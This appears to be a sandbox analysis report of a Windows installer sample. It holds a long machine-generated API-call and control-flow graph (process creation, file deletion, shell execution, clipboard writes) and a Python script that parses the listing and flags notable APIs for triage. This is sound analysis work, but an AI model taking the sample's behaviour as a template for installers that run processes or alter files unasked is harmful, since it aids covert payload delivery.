4854->4856 4861 405f7d wsprintfW 4855->4861 4858 402c6b SetFilePointer 4856->4858 4856->4860 4858->4860 4859 402d17 ReadFile 4859->4860 4860->4850 4860->4852 4860->4859 4861->4850 3417 402b23 GlobalAlloc 3418 402b39 3417->3418 3419 402b4b 3417->3419 3428 401446 3418->3428 3421 40145c 18 API calls 3419->3421 3422 402b52 WideCharToMultiByte lstrlenA 3421->3422 3423 402b41 3422->3423 3424 402b84 WriteFile 3423->3424 3425 402b93 3423->3425 3424->3425 3426 402384 GlobalFree 3424->3426 3426->3425 3429 406831 18 API calls 3428->3429 3430 401455 3429->3430 3430->3423 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3441 4054a5 3442 4055f9 3441->3442 3443 4054bd 3441->3443 3445 40564a 3442->3445 3446 40560a GetDlgItem GetDlgItem 3442->3446 3443->3442 3444 4054c9 3443->3444 3448 4054d4 SetWindowPos 3444->3448 3449 4054e7 3444->3449 3447 4056a4 3445->3447 3455 40139d 80 API calls 3445->3455 3450 403d6b 19 API calls 3446->3450 3456 4055f4 3447->3456 3511 403ddb 3447->3511 3448->3449 3452 405504 3449->3452 3453 4054ec ShowWindow 3449->3453 3454 405634 SetClassLongW 3450->3454 3457 405526 3452->3457 3458 40550c DestroyWindow 3452->3458 3453->3452 3459 40141d 80 API calls 3454->3459 3462 40567c 3455->3462 3460 40552b SetWindowLongW 3457->3460 3461 40553c 3457->3461 3463 405908 3458->3463 3459->3445 3460->3456 3464 4055e5 3461->3464 3465 405548 GetDlgItem 3461->3465 3462->3447 3466 405680 SendMessageW 3462->3466 3463->3456 3472 405939 ShowWindow 3463->3472 3531 403df6 3464->3531 3469 405578 3465->3469 3470 40555b SendMessageW IsWindowEnabled 3465->3470 3466->3456 3467 40141d 80 API calls 3480 4056b6 3467->3480 3468 40590a DestroyWindow KiUserCallbackDispatcher 3468->3463 3474 405585 3469->3474 3477 4055cc SendMessageW 3469->3477 3478 405598 3469->3478 3486 40557d 3469->3486 3470->3456 3470->3469 3472->3456 3473 406831 18 API calls 3473->3480 3474->3477 3474->3486 3476 403d6b 19 API calls 3476->3480 3477->3464 3481 4055a0 3478->3481 3482 
4055b5 3478->3482 3479 4055b3 3479->3464 3480->3456 3480->3467 3480->3468 3480->3473 3480->3476 3502 40584a DestroyWindow 3480->3502 3514 403d6b 3480->3514 3525 40141d 3481->3525 3483 40141d 80 API calls 3482->3483 3485 4055bc 3483->3485 3485->3464 3485->3486 3528 403d44 3486->3528 3488 405731 GetDlgItem 3489 405746 3488->3489 3490 40574f ShowWindow KiUserCallbackDispatcher 3488->3490 3489->3490 3517 403db1 KiUserCallbackDispatcher 3490->3517 3492 405779 EnableWindow 3495 40578d 3492->3495 3493 405792 GetSystemMenu EnableMenuItem SendMessageW 3494 4057c2 SendMessageW 3493->3494 3493->3495 3494->3495 3495->3493 3518 403dc4 SendMessageW 3495->3518 3519 406035 lstrcpynW 3495->3519 3498 4057f0 lstrlenW 3499 406831 18 API calls 3498->3499 3500 405806 SetWindowTextW 3499->3500 3520 40139d 3500->3520 3502->3463 3503 405864 CreateDialogParamW 3502->3503 3503->3463 3504 405897 3503->3504 3505 403d6b 19 API calls 3504->3505 3506 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3505->3506 3507 40139d 80 API calls 3506->3507 3508 4058e8 3507->3508 3508->3456 3509 4058f0 ShowWindow 3508->3509 3510 403ddb SendMessageW 3509->3510 3510->3463 3512 403df3 3511->3512 3513 403de4 SendMessageW 3511->3513 3512->3480 3513->3512 3515 406831 18 API calls 3514->3515 3516 403d76 SetDlgItemTextW 3515->3516 3516->3488 3517->3492 3518->3495 3519->3498 3523 4013a4 3520->3523 3521 401410 3521->3480 3523->3521 3524 4013dd MulDiv SendMessageW 3523->3524 3545 4015a0 3523->3545 3524->3523 3526 40139d 80 API calls 3525->3526 3527 401432 3526->3527 3527->3486 3529 403d51 SendMessageW 3528->3529 3530 403d4b 3528->3530 3529->3479 3530->3529 3532 403e0b GetWindowLongW 3531->3532 3542 403e94 3531->3542 3533 403e1c 3532->3533 3532->3542 3534 403e2b GetSysColor 3533->3534 3535 403e2e 3533->3535 3534->3535 3536 403e34 SetTextColor 3535->3536 3537 403e3e SetBkMode 3535->3537 3536->3537 3538 403e56 GetSysColor 3537->3538 3539 403e5c 3537->3539 3538->3539 3540 403e63 SetBkColor 3539->3540 3541 403e6d 
3539->3541 3540->3541 3541->3542 3543 403e80 DeleteObject 3541->3543 3544 403e87 CreateBrushIndirect 3541->3544 3542->3456 3543->3544 3544->3542 3546 4015fa 3545->3546 3625 40160c 3545->3625 3547 401601 3546->3547 3548 401742 3546->3548 3549 401962 3546->3549 3550 4019ca 3546->3550 3551 40176e 3546->3551 3552 401650 3546->3552 3553 4017b1 3546->3553 3554 401672 3546->3554 3555 401693 3546->3555 3556 401616 3546->3556 3557 4016d6 3546->3557 3558 401736 3546->3558 3559 401897 3546->3559 3560 4018db 3546->3560 3561 40163c 3546->3561 3562 4016bd 3546->3562 3546->3625 3571 4062cf 11 API calls 3547->3571 3563 401751 ShowWindow 3548->3563 3564 401758 3548->3564 3568 40145c 18 API calls 3549->3568 3575 40145c 18 API calls 3550->3575 3565 40145c 18 API calls 3551->3565 3589 4062cf 11 API calls 3552->3589 3569 40145c 18 API calls 3553->3569 3566 40145c 18 API calls 3554->3566 3570 401446 18 API calls 3555->3570 3574 40145c 18 API calls 3556->3574 3588 401446 18 API calls 3557->3588 3557->3625 3558->3625 3679 405f7d wsprintfW 3558->3679 3567 40145c 18 API calls 3559->3567 3572 40145c 18 API calls 3560->3572 3576 401647 PostQuitMessage 3561->3576 3561->3625 3573 4062cf 11 API calls 3562->3573 3563->3564 3577 401765 ShowWindow 3564->3577 3564->3625 3578 401775 3565->3578 3579 401678 3566->3579 3580 40189d 3567->3580 3581 401968 GetFullPathNameW 3568->3581 3582 4017b8 3569->3582 3583 40169a 3570->3583 3571->3625 3584 4018e2 3572->3584 3585 4016c7 SetForegroundWindow 3573->3585 3586 40161c 3574->3586 3587 4019d1 SearchPathW 3575->3587 3576->3625 3577->3625 3591 4062cf 11 API calls 3578->3591 3592 4062cf 11 API calls 3579->3592 3670 406301 FindFirstFileW 3580->3670 3594 4019a1 3581->3594 3595 40197f 3581->3595 3596 4062cf 11 API calls 3582->3596 3597 4062cf 11 API calls 3583->3597 3598 40145c 18 API calls 3584->3598 3585->3625 3599 4062cf 11 API calls 3586->3599 3587->3558 3587->3625 3588->3625 3600 401664 3589->3600 3601 401785 SetFileAttributesW 3591->3601 3602 401683 3592->3602 
3614 4019b8 GetShortPathNameW 3594->3614 3594->3625 3595->3594 3620 406301 2 API calls 3595->3620 3604 4017c9 3596->3604 3605 4016a7 Sleep 3597->3605 3606 4018eb 3598->3606 3607 401627 3599->3607 3608 40139d 65 API calls 3600->3608 3609 40179a 3601->3609 3601->3625 3618 404f9e 25 API calls 3602->3618 3652 405d85 CharNextW CharNextW 3604->3652 3605->3625 3615 40145c 18 API calls 3606->3615 3616 404f9e 25 API calls 3607->3616 3608->3625 3617 4062cf 11 API calls 3609->3617 3610 4018c2 3621 4062cf 11 API calls 3610->3621 3611 4018a9 3619 4062cf 11 API calls 3611->3619 3614->3625 3623 4018f5 3615->3623 3616->3625 3617->3625 3618->3625 3619->3625 3624 401991 3620->3624 3621->3625 3622 4017d4 3626 401864 3622->3626 3629 405d32 CharNextW 3622->3629 3647 4062cf 11 API calls 3622->3647 3627 4062cf 11 API calls 3623->3627 3624->3594 3678 406035 lstrcpynW 3624->3678 3625->3523 3626->3602 3628 40186e 3626->3628 3630 401902 MoveFileW 3627->3630 3658 404f9e 3628->3658 3633 4017e6 CreateDirectoryW 3629->3633 3634 401912 3630->3634 3635 40191e 3630->3635 3633->3622 3637 4017fe GetLastError 3633->3637 3634->3602 3641 406301 2 API calls 3635->3641 3651 401942 3635->3651 3639 401827 GetFileAttributesW 3637->3639 3640 40180b GetLastError 3637->3640 3639->3622 3644 4062cf 11 API calls 3640->3644 3645 401929 3641->3645 3642 401882 SetCurrentDirectoryW 3642->3625 3643 4062cf 11 API calls 3646 40195c 3643->3646 3644->3622 3645->3651 3673 406c94 3645->3673 3646->3625 3647->3622 3650 404f9e 25 API calls 3650->3651 3651->3643 3653 405da2 3652->3653 3656 405db4 3652->3656 3655 405daf CharNextW 3653->3655 3653->3656 3654 405dd8 3654->3622 3655->3654 3656->3654 3657 405d32 CharNextW 3656->3657 3657->3656 3659 404fb7 3658->3659 3660 401875 3658->3660 3661 404fd5 lstrlenW 3659->3661 3662 406831 18 API calls 3659->3662 3669 406035 lstrcpynW 3660->3669 3663 404fe3 lstrlenW 3661->3663 3664 404ffe 3661->3664 3662->3661 3663->3660 3665 404ff5 lstrcatW 3663->3665 3666 405011 3664->3666 3667 405004 
SetWindowTextW 3664->3667 3665->3664 3666->3660 3668 405017 SendMessageW SendMessageW SendMessageW 3666->3668 3667->3666 3668->3660 3669->3642 3671 4018a5 3670->3671 3672 406317 FindClose 3670->3672 3671->3610 3671->3611 3672->3671 3680 406328 GetModuleHandleA 3673->3680 3677 401936 3677->3650 3678->3594 3679->3625 3681 406340 LoadLibraryA 3680->3681 3682 40634b GetProcAddress 3680->3682 3681->3682 3683 406359 3681->3683 3682->3683 3683->3677 3684 406ac5 lstrcpyW 3683->3684 3685 406b13 GetShortPathNameW 3684->3685 3686 406aea 3684->3686 3687 406b2c 3685->3687 3688 406c8e 3685->3688 3710 405e7c GetFileAttributesW CreateFileW 3686->3710 3687->3688 3691 406b34 WideCharToMultiByte 3687->3691 3688->3677 3690 406af3 CloseHandle GetShortPathNameW 3690->3688 3692 406b0b 3690->3692 3691->3688 3693 406b51 WideCharToMultiByte 3691->3693 3692->3685 3692->3688 3693->3688 3694 406b69 wsprintfA 3693->3694 3695 406831 18 API calls 3694->3695 3696 406b95 3695->3696 3711 405e7c GetFileAttributesW CreateFileW 3696->3711 3698 406ba2 3698->3688 3699 406baf GetFileSize GlobalAlloc 3698->3699 3700 406bd0 ReadFile 3699->3700 3701 406c84 CloseHandle 3699->3701 3700->3701 3702 406bea 3700->3702 3701->3688 3702->3701 3712 405de2 lstrlenA 3702->3712 3705 406c03 lstrcpyA 3708 406c25 3705->3708 3706 406c17 3707 405de2 4 API calls 3706->3707 3707->3708 3709 406c5c SetFilePointer WriteFile GlobalFree 3708->3709 3709->3701 3710->3690 3711->3698 3713 405e23 lstrlenA 3712->3713 3714 405e2b 3713->3714 3715 405dfc lstrcmpiA 3713->3715 3714->3705 3714->3706 3715->3714 3716 405e1a CharNextA 3715->3716 3716->3713 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 
4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3891 4038af #17 SetErrorMode OleInitialize 3892 406328 3 API calls 3891->3892 3893 4038f2 SHGetFileInfoW 3892->3893 3965 406035 lstrcpynW 3893->3965 3895 
40391d GetCommandLineW 3966 406035 lstrcpynW 3895->3966 3897 40392f GetModuleHandleW 3898 403947 3897->3898 3899 405d32 CharNextW 3898->3899 3900 403956 CharNextW 3899->3900 3911 403968 3900->3911 3901 403a02 3902 403a21 GetTempPathW 3901->3902 3967 4037f8 3902->3967 3904 403a37 3906 403a3b GetWindowsDirectoryW lstrcatW 3904->3906 3907 403a5f DeleteFileW 3904->3907 3905 405d32 CharNextW 3905->3911 3909 4037f8 11 API calls 3906->3909 3975 4035b3 GetTickCount GetModuleFileNameW 3907->3975 3912 403a57 3909->3912 3910 403a73 3913 403af8 3910->3913 3915 405d32 CharNextW 3910->3915 3951 403add 3910->3951 3911->3901 3911->3905 3918 403a04 3911->3918 3912->3907 3912->3913 4060 403885 3913->4060 3919 403a8a 3915->3919 4067 406035 lstrcpynW 3918->4067 3930 403b23 lstrcatW lstrcmpiW 3919->3930 3931 403ab5 3919->3931 3920 403aed 3923 406113 9 API calls 3920->3923 3921 403bfa 3924 403c7d 3921->3924 3926 406328 3 API calls 3921->3926 3922 403b0d 3925 405ccc MessageBoxIndirectW 3922->3925 3923->3913 3927 403b1b ExitProcess 3925->3927 3929 403c09 3926->3929 3933 406328 3 API calls 3929->3933 3930->3913 3932 403b3f CreateDirectoryW SetCurrentDirectoryW 3930->3932 4068 4067aa 3931->4068 3935 403b62 3932->3935 3936 403b57 3932->3936 3937 403c12 3933->3937 4085 406035 lstrcpynW 3935->4085 4084 406035 lstrcpynW 3936->4084 3941 406328 3 API calls 3937->3941 3944 403c1b 3941->3944 3943 403b70 4086 406035 lstrcpynW 3943->4086 3945 403c69 ExitWindowsEx 3944->3945 3950 403c29 GetCurrentProcess 3944->3950 3945->3924 3949 403c76 3945->3949 3946 403ad2 4083 406035 lstrcpynW 3946->4083 3952 40141d 80 API calls 3949->3952 3954 403c39 3950->3954 4003 405958 3951->4003 3952->3924 3953 406831 18 API calls 3955 403b98 DeleteFileW 3953->3955 3954->3945 3956 403ba5 CopyFileW 3955->3956 3962 403b7f 3955->3962 3956->3962 3957 403bee 3958 406c94 42 API calls 3957->3958 3960 403bf5 3958->3960 3959 406c94 42 API calls 3959->3962 3960->3913 3961 406831 18 API calls 3961->3962 3962->3953 3962->3957 
3962->3959 3962->3961 3964 403bd9 CloseHandle 3962->3964 4087 405c6b CreateProcessW 3962->4087 3964->3962 3965->3895 3966->3897 3968 406064 5 API calls 3967->3968 3969 403804 3968->3969 3970 40380e 3969->3970 3971 40674e 3 API calls 3969->3971 3970->3904 3972 403816 CreateDirectoryW 3971->3972 3973 405eab 2 API calls 3972->3973 3974 40382a 3973->3974 3974->3904 4090 405e7c GetFileAttributesW CreateFileW 3975->4090 3977 4035f3 3997 403603 3977->3997 4091 406035 lstrcpynW 3977->4091 3979 403619 4092 40677d lstrlenW 3979->4092 3983 40362a GetFileSize 3984 403726 3983->3984 3998 403641 3983->3998 4097 4032d2 3984->4097 3986 40372f 3988 40376b GlobalAlloc 3986->3988 3986->3997 4109 403368 SetFilePointer 3986->4109 3987 403336 ReadFile 3987->3998 4108 403368 SetFilePointer 3988->4108 3991 4037e9 3994 4032d2 6 API calls 3991->3994 3992 403786 3995 40337f 33 API calls 3992->3995 3993 40374c 3996 403336 ReadFile 3993->3996 3994->3997 4001 403792 3995->4001 4000 403757 3996->4000 3997->3910 3998->3984 3998->3987 3998->3991 3998->3997 3999 4032d2 6 API calls 3998->3999 3999->3998 4000->3988 4000->3997 4001->3997 4001->4001 4002 4037c0 SetFilePointer 4001->4002 4002->3997 4004 406328 3 API calls 4003->4004 4005 40596c 4004->4005 4006 405972 4005->4006 4007 405984 4005->4007 4123 405f7d wsprintfW 4006->4123 4008 405eff 3 API calls 4007->4008 4009 4059b5 4008->4009 4011 4059d4 lstrcatW 4009->4011 4013 405eff 3 API calls 4009->4013 4012 405982 4011->4012 4114 403ec1 4012->4114 4013->4011 4016 4067aa 18 API calls 4017 405a06 4016->4017 4018 405a9c 4017->4018 4020 405eff 3 API calls 4017->4020 4019 4067aa 18 API calls 4018->4019 4021 405aa2 4019->4021 4022 405a38 4020->4022 4023 405ab2 4021->4023 4024 406831 18 API calls 4021->4024 4022->4018 4026 405a5b lstrlenW 4022->4026 4029 405d32 CharNextW 4022->4029 4025 405ad2 LoadImageW 4023->4025 4125 403ea0 4023->4125 4024->4023 4027 405b92 4025->4027 4028 405afd RegisterClassW 4025->4028 4030 405a69 lstrcmpiW 4026->4030 4031 405a8f 
4026->4031 4035 40141d 80 API calls 4027->4035 4033 405b9c 4028->4033 4034 405b45 SystemParametersInfoW CreateWindowExW 4028->4034 4036 405a56 4029->4036 4030->4031 4037 405a79 GetFileAttributesW 4030->4037 4039 40674e 3 API calls 4031->4039 4033->3920 4034->4027 4040 405b98 4035->4040 4036->4026 4041 405a85 4037->4041 4038 405ac8 4038->4025 4042 405a95 4039->4042 4040->4033 4043 403ec1 19 API calls 4040->4043 4041->4031 4044 40677d 2 API calls 4041->4044 4124 406035 lstrcpynW 4042->4124 4046 405ba9 4043->4046 4044->4031 4047 405bb5 ShowWindow LoadLibraryW 4046->4047 4048 405c38 4046->4048 4049 405bd4 LoadLibraryW 4047->4049 4050 405bdb GetClassInfoW 4047->4050 4051 405073 83 API calls 4048->4051 4049->4050 4052 405c05 DialogBoxParamW 4050->4052 4053 405bef GetClassInfoW RegisterClassW 4050->4053 4054 405c3e 4051->4054 4057 40141d 80 API calls 4052->4057 4053->4052 4055 405c42 4054->4055 4056 405c5a 4054->4056 4055->4033 4059 40141d 80 API calls 4055->4059 4058 40141d 80 API calls 4056->4058 4057->4033 4058->4033 4059->4033 4061 40389d 4060->4061 4062 40388f CloseHandle 4060->4062 4132 403caf 4061->4132 4062->4061 4067->3902 4185 406035 lstrcpynW 4068->4185 4070 4067bb 4071 405d85 4 API calls 4070->4071 4072 4067c1 4071->4072 4073 406064 5 API calls 4072->4073 4080 403ac3 4072->4080 4076 4067d1 4073->4076 4074 406809 lstrlenW 4075 406810 4074->4075 4074->4076 4078 40674e 3 API calls 4075->4078 4076->4074 4077 406301 2 API calls 4076->4077 4076->4080 4081 40677d 2 API calls 4076->4081 4077->4076 4079 406816 GetFileAttributesW 4078->4079 4079->4080 4080->3913 4082 406035 lstrcpynW 4080->4082 4081->4074 4082->3946 4083->3951 4084->3935 4085->3943 4086->3962 4088 405ca6 4087->4088 4089 405c9a CloseHandle 4087->4089 4088->3962 4089->4088 4090->3977 4091->3979 4093 40678c 4092->4093 4094 406792 CharPrevW 4093->4094 4095 40361f 4093->4095 4094->4093 4094->4095 4096 406035 lstrcpynW 4095->4096 4096->3983 4098 4032f3 4097->4098 4099 4032db 4097->4099 4102 403303 
GetTickCount 4098->4102 4103 4032fb 4098->4103 4100 4032e4 DestroyWindow 4099->4100 4101 4032eb 4099->4101 4100->4101 4101->3986 4105 403311 CreateDialogParamW ShowWindow 4102->4105 4106 403334 4102->4106 4110 40635e 4103->4110 4105->4106 4106->3986 4108->3992 4109->3993 4111 40637b PeekMessageW 4110->4111 4112 406371 DispatchMessageW 4111->4112 4113 403301 4111->4113 4112->4111 4113->3986 4115 403ed5 4114->4115 4130 405f7d wsprintfW 4115->4130 4117 403f49 4118 406831 18 API calls 4117->4118 4119 403f55 SetWindowTextW 4118->4119 4120 403f70 4119->4120 4121 403f8b 4120->4121 4122 406831 18 API calls 4120->4122 4121->4016 4122->4120 4123->4012 4124->4018 4131 406035 lstrcpynW 4125->4131 4127 403eb4 4128 40674e 3 API calls 4127->4128 4129 403eba lstrcatW 4128->4129 4129->4038 4130->4117 4131->4127 4133 403cbd 4132->4133 4134 4038a2 4133->4134 4135 403cc2 FreeLibrary GlobalFree 4133->4135 4136 406cc7 4134->4136 4135->4134 4135->4135 4137 4067aa 18 API calls 4136->4137 4138 406cda 4137->4138 4139 406ce3 DeleteFileW 4138->4139 4140 406cfa 4138->4140 4179 4038ae CoUninitialize 4139->4179 4141 406e77 4140->4141 4183 406035 lstrcpynW 4140->4183 4147 406301 2 API calls 4141->4147 4167 406e84 4141->4167 4141->4179 4143 406d25 4144 406d39 4143->4144 4145 406d2f lstrcatW 4143->4145 4148 40677d 2 API calls 4144->4148 4146 406d3f 4145->4146 4150 406d4f lstrcatW 4146->4150 4152 406d57 lstrlenW FindFirstFileW 4146->4152 4149 406e90 4147->4149 4148->4146 4153 40674e 3 API calls 4149->4153 4149->4179 4150->4152 4151 4062cf 11 API calls 4151->4179 4156 406e67 4152->4156 4180 406d7e 4152->4180 4154 406e9a 4153->4154 4157 4062cf 11 API calls 4154->4157 4155 405d32 CharNextW 4155->4180 4156->4141 4158 406ea5 4157->4158 4159 405e5c 2 API calls 4158->4159 4160 406ead RemoveDirectoryW 4159->4160 4164 406ef0 4160->4164 4165 406eb9 4160->4165 4161 406e44 FindNextFileW 4163 406e5c FindClose 4161->4163 4161->4180 4163->4156 4166 404f9e 25 API calls 4164->4166 4165->4167 4168 406ebf 4165->4168 
4166->4179 4167->4151 4170 4062cf 11 API calls 4168->4170 4169 4062cf 11 API calls 4169->4180 4171 406ec9 4170->4171 4174 404f9e 25 API calls 4171->4174 4172 406cc7 72 API calls 4172->4180 4173 405e5c 2 API calls 4175 406dfa DeleteFileW 4173->4175 4176 406ed3 4174->4176 4175->4180 4177 406c94 42 API calls 4176->4177 4177->4179 4178 404f9e 25 API calls 4178->4161 4179->3921 4179->3922 4180->4155 4180->4161 4180->4169 4180->4172 4180->4173 4180->4178 4181 404f9e 25 API calls 4180->4181 4182 406c94 42 API calls 4180->4182 4184 406035 lstrcpynW 4180->4184 4181->4180 4182->4180 4183->4143 4184->4180 4185->4070 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3717 4021b5 3718 40145c 18 API calls 3717->3718 3719 4021bb 3718->3719 3720 40145c 18 API calls 3719->3720 3721 4021c4 3720->3721 3722 40145c 18 API calls 3721->3722 3723 4021cd 3722->3723 3724 40145c 18 API calls 3723->3724 3725 4021d6 3724->3725 3726 404f9e 25 API calls 3725->3726 3727 4021e2 ShellExecuteW 3726->3727 3728 40221b 3727->3728 3729 40220d 3727->3729 3730 4062cf 11 API calls 3728->3730 3731 4062cf 11 API calls 3729->3731 3732 402230 3730->3732 3731->3728 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 
4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                                              Control-flow Graph

Control-flow graph for the function at 0x4050f9 (basic blocks 0x4050f9 through 0x4054a0); the raw block and edge list from the interactive viewer is omitted. The function sets up a list-view dialog (GetDlgItem, GetClientRect, GetSystemMetrics, SendMessageW, ShowWindow), starts a worker thread whose handle it closes immediately (CreateThread, CloseHandle), and on request shows a one-item popup menu (CreatePopupMenu, AppendMenuW, GetWindowRect, TrackPopupMenu) that collects text from the list control via SendMessageW and places it on the clipboard (OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock, GlobalUnlock, SetClipboardData, CloseClipboard).
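As an added example, not part of the Joe Sandbox report or of the analysed sample, the following Python parses lines in the format of the APIs table below (`Api.MODULE(args), ref: address`, including the indented "Part of subcall function" entries and the entry whose string arguments contain parentheses) into structured records, tallies calls per module, counts arguments the sandbox left unresolved as `?`, and flags a triage watchlist. The sample lines are copied from this page; the watchlist, the helper names and the `ApiCall` record are assumptions for illustration, not a Joe Sandbox format definition.

```python
"""Parse Joe Sandbox 'APIs' listing lines into structured call records."""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Lines copied from the API listing on this page (one "Part of subcall function"
# entry and the nested-parenthesis lstrlenW entry included on purpose).
SAMPLE_LISTING = """\
• GetDlgItem.USER32(?,00000403), ref: 0040515B
• SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
  • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
• CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
• CreatePopupMenu.USER32 ref: 004053A2
• OpenClipboard.USER32(00000000), ref: 00405437
• EmptyClipboard.USER32 ref: 0040543D
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
"""

LINE_RE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>#?\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?"  # greedy: the last ')' before 'ref:' closes the args
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple[str, ...]
    ref: int                       # address of the call site
    subcall: Optional[int] = None  # set for "Part of subcall function" entries


def _split_args(raw: str) -> tuple[str, ...]:
    """Split on commas at parenthesis depth 0 so string args with '(' survive."""
    if not raw.strip():
        return ()
    out, cur, depth = [], [], 0
    for ch in raw:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        if ch == "," and depth == 0:
            out.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    out.append("".join(cur).strip())
    return tuple(out)


def parse_api_listing(text: str) -> list[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:  # headings such as "APIs" and blank lines are skipped
            continue
        calls.append(ApiCall(
            api=m["api"],
            module=m["module"],
            args=_split_args(m["args"] or ""),
            ref=int(m["ref"], 16),
            subcall=int(m["sub"], 16) if m["sub"] else None,
        ))
    return calls


def calls_by_module(calls: list[ApiCall]) -> Counter:
    return Counter(c.module for c in calls)


# Assumed triage watchlist: APIs seen in this page's graphs that change process,
# clipboard or file state. It is an example list, not a Joe Sandbox rule.
WATCHLIST = frozenset({
    "CreateThread", "CreateProcessW", "ShellExecuteW", "OpenClipboard",
    "SetClipboardData", "ExitWindowsEx", "CopyFileW", "DeleteFileW",
})


def flag_notable(calls: list[ApiCall], watchlist=WATCHLIST) -> list[ApiCall]:
    return [c for c in calls if c.api in watchlist]


def unresolved_args(calls: list[ApiCall]) -> int:
    """Count '?' arguments, i.e. values the sandbox could not recover."""
    return sum(a == "?" for c in calls for a in c.args)


if __name__ == "__main__":
    calls = parse_api_listing(SAMPLE_LISTING)
    for c in calls:
        via = f" (via subcall 0x{c.subcall:08X})" if c.subcall else ""
        print(f"{c.api}.{c.module} at 0x{c.ref:08X}{via} args={c.args}")
    print(dict(calls_by_module(calls)), "unresolved:", unresolved_args(calls))
    print("watchlist hits:", [f"{c.api}@0x{c.ref:08X}" for c in flag_notable(calls)])
```

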